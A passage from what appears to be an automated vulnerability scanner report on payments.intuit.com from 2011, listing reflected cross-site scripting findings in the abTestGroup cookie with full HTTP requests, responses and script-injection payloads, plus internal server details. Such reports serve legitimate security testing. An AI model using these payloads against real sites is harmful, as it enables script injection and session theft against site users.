s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ae697<script>alert(1)</script>aec6008fd49;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tAv7LIDUwQblTJIPVSG6vw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614D8C0A0805192AA117E310637E4F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151814


...[SNIP]...
<br />
       A/B Test Group: T16ae697<script>alert(1)</script>aec6008fd49<br />
...[SNIP]...

1.84. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671c4"><script>alert(1)</script>a7dc609c67f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16671c4"><script>alert(1)</script>a7dc609c67f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:26 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bUbasadyi6fmev5ohVeXRg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:27 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FF17B0A0805192AA117E3CEC0F01D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151828


...[SNIP]...
<input id="testGroup" value="T16671c4"><script>alert(1)</script>a7dc609c67f" type="hidden" />
...[SNIP]...

1.85. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ac6ae<script>alert(1)</script>299a08e1cc6 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ac6ae<script>alert(1)</script>299a08e1cc6;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3dHufc-Aa20gfU8Z-4d3xw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9600CF00A0805192AA117E3E54E1420
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110761

...[SNIP]...
<br />
       A/B Test Group: T16ac6ae<script>alert(1)</script>299a08e1cc6<br />
...[SNIP]...

1.86. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c27"><script>alert(1)</script>2c3cad478e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0c27"><script>alert(1)</script>2c3cad478e;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=og8RtTbm1WZuq3QVWh104A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E37AB0A0805192AA117E3FF7FB774
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110773

...[SNIP]...
<input id="testGroup" value="T16b0c27"><script>alert(1)</script>2c3cad478e" type="hidden" />
...[SNIP]...

1.87. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3b445<script>alert(1)</script>1d1b4924dde was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163b445<script>alert(1)</script>1d1b4924dde;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=U3+YzUdBpMmGMr2JBIzxEA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C018A0A0805192AA117E33D70DA63
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96470

...[SNIP]...
<br />
       A/B Test Group: T163b445<script>alert(1)</script>1d1b4924dde<br />
...[SNIP]...

1.88. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c3d"><script>alert(1)</script>97f3c4b0963 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1647c3d"><script>alert(1)</script>97f3c4b0963;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zfKFegXLRVzqLsEN5G1LJQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC4050A0805192AA117E3D09F65EC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96483

...[SNIP]...
<input id="testGroup" value="T1647c3d"><script>alert(1)</script>97f3c4b0963" type="hidden" />
...[SNIP]...

1.89. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83731"><script>alert(1)</script>8d0a1b75f18 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1683731"><script>alert(1)</script>8d0a1b75f18;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:16 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=CUtOQX98VPCW+SKAA2O34A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:17 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95DF3390A0805192AA117E3EF2B1833
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109447

...[SNIP]...
<input id="testGroup" value="T1683731"><script>alert(1)</script>8d0a1b75f18" type="hidden" />
...[SNIP]...

1.90. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d7ba9<script>alert(1)</script>df514fb9a00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d7ba9<script>alert(1)</script>df514fb9a00;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:00 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=l6UJNFXwWEDsLIgDbSXdhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:01 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F89450A0805192AA117E396BE25DA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109433

...[SNIP]...
<br />
